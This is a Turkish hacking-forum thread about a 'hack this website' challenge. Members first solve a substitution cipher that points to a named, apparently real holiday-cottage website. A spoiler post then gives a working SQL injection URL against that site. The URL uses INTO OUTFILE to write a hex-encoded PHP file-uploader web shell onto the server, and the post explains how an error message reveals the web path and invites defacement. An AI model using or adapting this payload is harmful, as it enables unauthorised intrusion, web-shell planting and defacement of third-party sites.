Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Meydan Okuma - Hack Website Test
Meydan Okuma - Hack Website Test
-
tbt.html nerde :D
Edit: neyse oluşturdum :D yaz benide listeye @Allura
NoktaliVirgul tarafından 04/Tem/15 09:25 tarihinde düzenlenmiştir -
En sonunda kısaca nasıl yapıldığını da anlatmalısın allura yapamayanlar olarak özeniyoruz :)
-
Hocalar bu işler nasıl oluyor, o kriptodan web sitesini nasıl buluyorsunuz pm den anlatabilecek olan varmı yada buraya bi yerlere yazsa yeni başlayaıp öğrenmek isteyemlerr vardır benim gibi :)
-
Abi keşke konuyu açtıktan 2-3 gün sonra da çözüm yolunu kısaca anlatsan, biz de bir şeyler öğrensek.
-
mkyyldrm bunu yazdı
Hocalar bu işler nasıl oluyor, o kriptodan web sitesini nasıl buluyorsunuz pm den anlatabilecek olan varmı yada buraya bi yerlere yazsa yeni başlayaıp öğrenmek isteyemlerr vardır benim gibi :)
2-3 gün geçti
Kripto kısmını basitçe anlatayım sizlere
:// şu işaret olduğuna göre demekki web sitesi web sitesi ne ile başlar Http:// ile değilmi
bu adam ne yapmış myyi://KKK
"m" yi "h" düşün "y" yi "t" "i" ye de p oluyor
"kkk" NE OLUYOR " www"
buradan yola çıkarak hangi harfe hangi harf denk geliyorsa karşılaştırıp bulmaca misali harfleri yerine oturtacaksın
en alta "-sxxets" yazmış bu adamın nicki çoğu şeyde imza niteliğinde en alta koyulmaz mı koyulur bu adamın Nicki ne "Allura" sayın harf sayısını "sxxets" ile aynı değilmi
yine aynı mantık
"s" gördüğün yer neymiş "A" imiş "x "gördüğün yer "l" "e" gördüğün yer "u" imiş
Sitenin kısaltması TBT olduğundan yazının veya linkin içinde mutlaka TBT geçebilir diye düşüneceksin
bak linkin sonunda ypy var bu garanti TBT dir bu ne demek oluyor p gördüğün yer aslında b imiş
.ovz diyor bu ne oluyor domain uzantısı nedir genelde ya .com dur ya da.net
en alttaki linke Baktığımızda bu adam tahribat.com u kesin yazmıştır diye tahmin ettiğimizde
htttp://www.tahribat.com ile harf sayısı bakın birebir tutuyor
zaten
şimdi gelelim linkin sonuna "ypy" nin "tbt" olduğunu biliyoruz
"xa" yi da daha önce çözmüştü "le"olduğunu
oldu mu "letbt" ne le tbt olacak olsa olsa mantık yürüttüğünde HACK konusu hackletbt olur değilmi
bakalım zaten msof hack kelimesiyle eşit zaten
http://www.tcgnurl.com/hackletbt böyle bir şey çıktı karşımızı ulan bu "cgn" nedir diye düşüneceğiz
az mantığınızı çalıştıracaksınız sitenin url ile bittiğine göre bu kesin bir link kısaltma servisidir diye düşündüm ben açıkçası ama olmayabilirdide ve denedim miniurl ve tiny url aklıma geldi
sonradan düşündüm miniurl / dan sonra geleni kendi belirliyordu ama tiny url öyle değil sonuna kendin belirliyorsun
http://www.tinyurl.com/hackletbt yazdım
bir baktım tuttu ve gitti siteye
http://branthwaitecottages.co.uk/
yani siteye ulaşmış bulundum
Not: Arkadaşlar amatörce anlatmış olabilirim umarım anlamışsınızdır birazcık açıkçası bu konulara internette aşina olmanı gerek sıfırdan bir adamın tahmin etme olayı kısıtlı olur ve kriptoyu çözme mantığı olmayabilir
örneğin link kısaltma servislerinden haberi olmayan bir adam sittin sene bulamazdı gibi
ben bu şekilde ulaştım diğer arkadaşlar başka başka şekilde ulaşmış olabilirler hayal gücünüze bağlı birazda
krpitoyu çözme kısmını ben anlattım diğer kısımlarıda diğer arkaşlar anlatırsa sevinirim....
kolay gelsin -
Serdar abi açıklama için teşekkürler, çok eğlenceli bir şeymiş.
-
----- SPOİLER ÇÖZÜM ------
----- SPOİLER ÇÖZÜM ------
Çözümünü veriyorum,
serdar kriptunun nasıl çözüldügünü anlattıgı için orasını geçiyorum
bkz: kriptu çözümü= http://www.tahribat.com/forum/meydan-okuma---hack-website-test-208426/5#msg2594172
gelelim shell yüklemeye
sitenin ismi http://branthwaitecottages.co.uk içerisinde 4-5 adet php dosyası mevcut bunlardan bir tanesinde sql açıgı bulunmakta
sql injection kullanılarak ve database user yetkilerinin fazla olması sebebi ile grant all priv.. yazma yetkimiz bulunuyor burada mysql yetkilendirmesi hatası var
bu açıgı kullanarak sql injectionyaparken sunucuya istedigimiz şeyi yazabiliyoruz
http://branthwaitecottages.co.uk:80/Gallery.php?pagenum=1&menu=off&imagefilter=1 LIMIT 0,1 INTO OUTFILE 'C:/wamp/www/branthwaite/tbtyukle.php' LINES TERMINATED BY 0x92020202020203c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e-- #
kodu kullanarak dizine tbtyukle.php dosyasını yüklemiş oluyoruz dizini nasıl buldugumuza gelirsek kod hatası sebebi ile bize yolu veriyor site http://branthwaitecottages.co.uk:80/Gallery.php?pagenum=1&menu=off&imagefilter=1' bu şekilde girerseniz yol görünüyor.shell yükledikten sonra birşey kalmıyor zaten geçmiş olsun editle geç
----- SPOİLER ÇÖZÜM ------
----- SPOİLER ÇÖZÜM ------
-
SerYolcu bunu yazdıAllura bunu yazdıolayımız bu kadar kriptolu resmi koyuyorum başlayabilirsiniz :)
Bu kripto nasıl çözülüyor... Birisi anlatsın bi...
Nassııı. o zaman fark edememişşim.. Ee Çantalarda kullanılan dönel şifrelerden imâ ediyorsun ama.